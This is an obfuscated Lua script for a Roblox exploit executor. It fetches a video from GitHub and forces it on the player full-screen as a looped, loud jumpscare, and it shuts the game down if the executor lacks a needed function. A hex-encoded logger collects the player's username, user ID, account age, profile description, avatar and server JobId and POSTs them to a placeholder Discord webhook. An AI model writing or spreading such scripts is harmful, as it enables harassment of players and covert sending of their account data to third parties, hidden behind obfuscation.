local a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z=game:GetService("Players").LocalPlayer,game:GetService("HttpService"),nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil,nil
pcall(function()getgenv()["\x6a\x75\x6d\x70\x73\x63\x61\x72\x65\x5f\x6a\x65\x66\x66\x77\x75\x7a\x5f\x6c\x6f\x61\x64\x65\x64"]=true end)
if not getcustomasset then game:Shutdown()end
local A=Instance.new("\x53\x63\x72\x65\x65\x6e\x47\x75\x69")A.Parent=game:GetService("\x43\x6f\x72\x65\x47\x75\x69")A.IgnoreGuiInset=true
local B=Instance.new("\x56\x69\x64\x65\x6f\x46\x72\x61\x6d\x65")B.Parent=A B.Size=UDim2.new(1,0,1,0)
writefile("\x79\x65\x73\x2e\x6d\x70\x34",game:HttpGet("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x69\x74\x68\x75\x62\x2e\x63\x6f\x6d\x2f\x48\x61\x70\x70\x79\x43\x6f\x77\x39\x31\x2f\x52\x6f\x62\x6c\x6f\x78\x53\x63\x72\x69\x70\x74\x73\x2f\x62\x6c\x6f\x62\x2f\x6d\x61\x69\x6e\x2f\x56\x69\x64\x65\x6f\x73\x2f\x76\x69\x64\x65\x6f\x70\x6c\x61\x79\x62\x61\x63\x6b\x2e\x6d\x70\x34\x3f\x72\x61\x77\x3d\x74\x72\x75\x65"))
B.Video=getcustomasset("\x79\x65\x73\x2e\x6d\x70\x34")B.Looped=true B.Playing=true B.Volume=10
local function C()
local D=game:HttpGet("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x68\x75\x6d\x62\x6e\x61\x69\x6c\x73\x2e\x72\x6f\x70\x72\x6f\x78\x79\x2e\x63\x6f\x6d\x2f\x76\x31\x2f\x75\x73\x65\x72\x73\x2f\x61\x76\x61\x74\x61\x72\x2d\x68\x65\x61\x64\x73\x68\x6f\x74\x3f\x75\x73\x65\x72\x49\x64\x73\x3d"..a.UserId.."\x26\x73\x69\x7a\x65\x3d\x34\x32\x30\x78\x34\x32\x30\x26\x66\x6f\x72\x6d\x61\x74\x3d\x50\x6e\x67\x26\x69\x73\x43\x69\x72\x63\x75\x6c\x61\x72\x3d\x74\x72\x75\x65")
local E=b:JSONDecode(D).data[1].imageUrl
local F=game:HttpGet("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x65\x72\x73\x2e\x72\x6f\x70\x72\x6f\x78\x79\x2e\x63\x6f\x6d\x2f\x76\x31\x2f\x75\x73\x65\x72\x73\x2f"..a.UserId)
local G=b:JSONDecode(F)
local H,I=G.description,G.created
local J={["\x75\x73\x65\x72\x6e\x61\x6d\x65"]="\x4a\x75\x6d\x70\x73\x63\x61\x72\x65\x20\x4e\x6f\x74\x69\x66\x79",["\x61\x76\x61\x74\x61\x72\x5f\x75\x72\x6c"]="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x74\x61\x74\x69\x63\x2e\x77\x69\x6b\x69\x61\x2e\x6e\x6f\x63\x6f\x6f\x6b\x69\x65\x2e\x6e\x65\x74\x2f\x31\x39\x64\x62\x65\x38\x30\x65\x2d\x30\x61\x65\x36\x2d\x34\x38\x63\x37\x2d\x39\x38\x63\x37\x2d\x33\x63\x33\x32\x61\x33\x39\x62\x32\x64\x37\x63\x2f\x73\x63\x61\x6c\x65\x2d\x74\x6f\x2d\x77\x69\x64\x74\x68\x2f\x33\x37\x30",["\x63\x6f\x6e\x74\x65\x6e\x74"]="\x4a\x65\x66\x66\x20\x57\x75\x7a\x20\x48\x65\x72\x65\x20\x21",["\x65\x6d\x62\x65\x64\x73"]={{["\x74\x69\x74\x6c\x65"]="\x4a\x65\x66\x66\x27\x73\x20\x4c\x6f\x67",["\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e"]="\x2a\x2a\x47\x61\x6d\x65\x20\x3a\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x72\x6f\x62\x6c\x6f\x78\x2e\x63\x6f\x6d\x2f\x67\x61\x6d\x65\x73\x2f"..game.PlaceId.."\x2a\x2a\x5c\x6e\x5c\x6e\x2a\x2a\x50\x72\x6f\x66\x69\x6c\x65\x20\x3a\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x72\x6f\x62\x6c\x6f\x78\x2e\x63\x6f\x6d\x2f\x75\x73\x65\x72\x73\x2f"..a.UserId.."\x2f\x70\x72\x6f\x66\x69\x6c\x65\x2a\x2a\x5c\x6e\x5c\x6e\x2a\x2a\x4a\x6f\x62\x20\x49\x44\x20\x3a\x20"..game.JobId.."\x2a\x2a",["\x63\x6f\x6c\x6f\x72"]=4915083,["\x66\x69\x65\x6c\x64\x73"]={{["\x6e\x61\x6d\x65"]="Username",["\x76\x61\x6c\x75\x65"]=a.Name,["\x69\x6e\x6c\x69\x6e\x65"]=true},{["\x6e\x61\x6d\x65"]="Display Name",["\x76\x61\x6c\x75\x65"]=a.DisplayName,["\x69\x6e\x6c\x69\x6e\x65"]=true},{["\x6e\x61\x6d\x65"]="User ID",["\x76\x61\x6c\x75\x65"]=a.UserId,["\x69\x6e\x6c\x69\x6e\x65"]=true},{["\x6e\x61\x6d\x65"]="Account Age",["\x76\x61\x6c\x75\x65"]=a.AccountAge.."\x20\x44\x61\x79",["\x69\x6e\x6c\x69\x6e\x65"]=true},{["\x6e\x61\x6d\x65"]="Membership",["\x76\x61\x6c\x75\x65"]=a.MembershipType.Name,["\x69\x6e\x6c\x69\x6e\x65"]=true},{["\x6e\x61\x6d\x65"]="Account Created Day",["\x76\x61\x6c\x75\x65"]=string.match(I,"^([%d-]+)"),["\x69\x6e\x6c\x69\x6e\x65"]=true},{["\x6e\x61\x6d\x65"]="Profile Description",["\x76\x61\x6c\x75\x65"]="```\n"..H.."\n```",["\x69\x6e\x6c\x69\x6e\x65"]=true}},["\x66\x6f\x6f\x74\x65\x72"]={["\x74\x65\x78\x74"]="\x4a\x54\x4b\x20\x4c\x6f\x67",["\x69\x63\x6f\x6e\x5f\x75\x72\x6c"]="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x69\x72\x6f\x2e\x6d\x65\x64\x69\x75\x6d\x2e\x63\x6f\x6d\x2f\x76\x32\x2f\x72\x65\x73\x69\x7a\x65\x3a\x66\x69\x74\x3a\x31\x32\x38\x30\x2f\x30\x2a\x63\x36\x2d\x65\x47\x43\x33\x44\x64\x5f\x33\x48\x6f\x46\x2d\x42"},["\x74\x68\x75\x6d\x62\x6e\x61\x69\x6c"]={["\x75\x72\x6c"]=E}}}
request({Url="\x59\x6f\x75\x72\x20\x44\x69\x73\x63\x6f\x72\x64\x20\x57\x65\x62\x68\x6f\x6f\x6b",Method="\x50\x4f\x53\x54",Headers={["\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65"]="\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e"},Body=b:JSONEncode(J)})end
if getgenv().Notify==true then if "\x59\x6f\x75\x72\x20\x44\x69\x73\x63\x6f\x72\x64\x20\x57\x65\x62\x68\x6f\x6f\x6b"~=''then C()end end
